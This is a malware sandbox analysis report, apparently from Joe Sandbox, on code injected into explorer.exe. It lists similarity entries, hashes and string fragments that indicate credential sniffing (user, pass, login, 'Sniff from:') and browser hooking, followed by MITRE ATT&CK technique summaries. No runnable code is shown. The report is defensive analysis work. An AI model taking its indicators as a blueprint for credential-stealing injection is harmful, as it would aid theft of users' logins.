Snapshot File: hcaresult_10_2_10bb0000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: ca479f0e79d2c155422495468379334036af2c99a24c560f7c5c54642fb5c281
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: 3D416B31A18E0D8FCB88EF68C0957ED73E1FB58340F51856EA80AD7244DE31D9418F86

Function 10801432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

.dll, xrefs: 1080153F
kern, xrefs: 1080152A
h, xrefs: 1080151F
el32, xrefs: 10801537

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: 51b51ea40f6f5dbd86ceac2c2cbad81c2930a54d34a3efdc060a220767e2f517
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: EC41827060CB4D8FDB94DF2988853AAB7E1FB98310F104B6E949EC7259DB70D945CB41

Function 09721432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

el32, xrefs: 09721537
kern, xrefs: 0972152A
h, xrefs: 0972151F
.dll, xrefs: 0972153F

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: a65d3506a9962860faa802519503d47c70f73c279135a2c4f861edb68328f0c9
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 8241907161CB4D8FD7A9DF2980883AAB7E1FBA8300F544B6E949EC3255DB70C545CB81

Function 108080B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

f fr, xrefs: 1080813D
, xrefs: 10808184
Snif, xrefs: 10808154
om:, xrefs: 10808146

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 36899256b14e16ccf7eff170380f2496bf542c5ac1af5efd0993956c4c942106
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 1531E13451CB88AFC71ADF28C8856DABBD0FB84300F50491EE49BC7256EE30A54ACB42

Function 097280B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

Snif, xrefs: 09728154
, xrefs: 09728184
om:, xrefs: 09728146
f fr, xrefs: 0972813D

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 0e1865219fc7f3cef387d09a7c1c3b1eaa07c3f88cc1e30f5fab477655599dbe
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 4531D67251CB485FD72ADB28C4887DAB7D4FB94300F50891EE49BC7291EE31A54ACB43

Function 108080C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

f fr, xrefs: 1080813D
, xrefs: 10808184
Snif, xrefs: 10808154
om:, xrefs: 10808146

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: e0414420f25958cf0a8aafc337e5c3459e3eb38c8ee48feef39a3c9b291f4010
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: 2A31E37551CB48AFD759DF28C8856EAB7D4FB94300F40492EE49BC325AEE30E546CA42

Function 097280C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

Snif, xrefs: 09728154
, xrefs: 09728184
om:, xrefs: 09728146
f fr, xrefs: 0972813D

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 9ecdcae7686115b0e57bc8bab89e5ad4e27101468a8b063ab75b65463bc31770
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: 1631A572528B486FD72ADF24C4887EAB7D4FB94300F50891EE49BC7291EE31E546CA43

Function 10C7B0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

, xrefs: 10C7B184
Snif, xrefs: 10C7B154
f fr, xrefs: 10C7B13D
om:, xrefs: 10C7B146

Memory Dump Source

Source File: 0000000A.00000002.4490030404.0000000010BB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10bb0000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 9fb2e6cce2ae0875dc20476948c7bbc97d5e60929e4b2d3b953d4590d26ec031
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: E131E071509B486FD759DF28C4856EAB7D4FB94300F50891EE4ABC7252EE30A90ACF43

Function 10803FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

me_c, xrefs: 10803FEE
hild, xrefs: 10803FF6
.dll, xrefs: 10803FFE
chro, xrefs: 10804023

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 4fc212e077f38769fc9a21115dd0dfee7d7218969d9f6d8e3f43cb00bdd3b6e2
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 2A316F7511CB484FC784EF6C8895BAA77E1FB94200F85453DA44AC7219DF30D945CB56

Function 09723FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

hild, xrefs: 09723FF6
chro, xrefs: 09724023
.dll, xrefs: 09723FFE
me_c, xrefs: 09723FEE

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 1c22be20638a7ad7fb7b24ae0675f8c1a84c26dca41a4f23c9d55e6fb28cdc10
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 74317032128B688FC794EF288498BAAB7E1FB94300F94556DA44AC7255DF30C545C796

Function 10803FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

me_c, xrefs: 10803FEE
hild, xrefs: 10803FF6
.dll, xrefs: 10803FFE
chro, xrefs: 10804023

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: e80e2f20ebc23e6a2ff1d555600a7aa3aebf4824b28127bb90629370d6211f02
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: EB316B7511CB488FC784EF6C8895AAAB7E1FB98200F85462DA44ACB259DF30D945CB86

Function 09723FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

hild, xrefs: 09723FF6
chro, xrefs: 09724023
.dll, xrefs: 09723FFE
me_c, xrefs: 09723FEE

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: 0e1db2cb8ab66a65eef96fbf11b924c4a8d55bb8558132dfa000c8653d8dede9
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: F931A432128B688FC794EF2884987AAB7E1FFD4300F94567D944AC7255DF30C545C796

Function 108068C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

on.d, xrefs: 10806902
User-Agent: , xrefs: 10806935, 10806948
nt: , xrefs: 1080691E
urlmon.dll, xrefs: 10806959

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 04df3d69349183f81450551b346a930d77c2fe1db6fbb498e9020bbc15b69cd8
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: BC31B131618A4C8FCB44EFA8C8857EDBBE1FB58214F40422AE45ED7254DF749645C789

Function 097268C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

nt: , xrefs: 0972691E
User-Agent: , xrefs: 09726935, 09726948
on.d, xrefs: 09726902
urlmon.dll, xrefs: 09726959

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 1b73fce20234b9585c8b6314ef7398fdf4080ecc396b105d6040dba2aed46fd1
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 6A31E332624A1C8FCB15EFA8C8887EDBBE0FF58205F40822AD44ED7250DF748645C789

Function 10C798C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

nt: , xrefs: 10C7991E
User-Agent: , xrefs: 10C79935, 10C79948
on.d, xrefs: 10C79902
urlmon.dll, xrefs: 10C79959

Memory Dump Source

Source File: 0000000A.00000002.4490030404.0000000010BB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10bb0000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 6fa5e54d64c06733067b9f808320e7b430664de246fcb57642281761384431d0
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 9B31DF31614A0D8BCB44EFA8C8857EEB7E1FB58205F40422AE45ED7240EF789645CB89

Function 108068BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

on.d, xrefs: 10806902
User-Agent: , xrefs: 10806935, 10806948
nt: , xrefs: 1080691E
urlmon.dll, xrefs: 10806959

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 7df106dced9ca27556579148ec98f4f216da62bd174bdae4b34cb3292d30a7b8
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: BC21D270618B4C8FCB04EFA8C8857EDBBE0FF58204F40422AE45AD7258DF749605C789

Function 097268BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

nt: , xrefs: 0972691E
User-Agent: , xrefs: 09726935, 09726948
on.d, xrefs: 09726902
urlmon.dll, xrefs: 09726959

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: b3c1819b952bfdd4dd276354a1b15a44ba8379bbfed984a6248392c2809867e8
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: C421E671624A1C8BCB15EFA8C8487ED7BE0FF58205F40922EE45AD7250DF748605C785

Function 10807E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

t, xrefs: 10807EF4
l, xrefs: 10807F26
., xrefs: 10807F1F
l, xrefs: 10807F03

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 1c6a8ed9ee0bb33cb75b1611bc1f3d2a4b6bb2eee24217f904837529b82a6d0e
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 64217A74A28B0D9FDB48EFA8C444BAEBAF0FB58310F50462EE409D3604DB74A591CB84

Function 10807E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

t, xrefs: 10807EF4
l, xrefs: 10807F26
., xrefs: 10807F1F
l, xrefs: 10807F03

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: f3aae1484746443d332f9bad6271799817bf9ce250d13673a9ac71fd2050b898
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: FF218B74A28B0D9BDB08EFA8C845BEDBBF0FB58310F50462EE409D3604DB74A551CB84

Function 09727E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

t, xrefs: 09727EF4
., xrefs: 09727F1F
l, xrefs: 09727F03
l, xrefs: 09727F26

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 08b54faf71f436e9b315755bcfccaa9aa424d2e077b7f784e94ffe2a9641d95f
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 1A217A71A24B1D9FDB18EFA8C0487AEBBF0FB58300F50962ED049D3650DB749591CB84

Function 09727E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

t, xrefs: 09727EF4
., xrefs: 09727F1F
l, xrefs: 09727F03
l, xrefs: 09727F26

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: c777b91573c36ade4fa751527013611fe9d460eed31422ec321cb2cfa923176b
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 7F218B71A24B1D9BDB18EFA8C0487EEBBF0FB58300F50962ED049D3640DB749591CB84

Function 10C7AE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 10C7AF03
., xrefs: 10C7AF1F
l, xrefs: 10C7AF26
t, xrefs: 10C7AEF4

Memory Dump Source

Source File: 0000000A.00000002.4490030404.0000000010BB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10bb0000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 426c7e5b7746c68b317f7ae0e192024f845b6b2ad971e2d92e17dd718e1d2758
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 5A216B74A24A0D9BDB48EFA8D0457EEBBF1FF58314F60462EE019D3600DB74A5918F88

Function 10C7AE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 10C7AF03
., xrefs: 10C7AF1F
l, xrefs: 10C7AF26
t, xrefs: 10C7AEF4

Memory Dump Source

Source File: 0000000A.00000002.4490030404.0000000010BB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10bb0000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 03cab4d5545a50376045191214caa5d0288bad78048c03ad0a231a5284636102
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 54215C74A24A0D9BDB48EFA8D0457AEBAF1FF58314F60462EE019D3610DB74A5918F88

Function 10807FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

auth, xrefs: 1080802F
pass, xrefs: 10808022
logi, xrefs: 1080803C
user, xrefs: 10808015

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 438141c06e9d8d063f6a5fcacbd9739a278527a95706ce18636008e94800102a
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: D221DF30628B0D8BCB45DF9D98917DEB7F1EF88354F004619E44AEB248D7B1E9548BC6

Function 09727FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

auth, xrefs: 0972802F
pass, xrefs: 09728022
user, xrefs: 09728015
logi, xrefs: 0972803C

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: f75c3d4703268b58b4a8553f764e502842e4d173bfe0b535319a693100ac54d1
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 5221CD32724B0D8BCB15DF9998917EEB7E1FF88344F009619E40AEB245D7B5D9148BC2

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
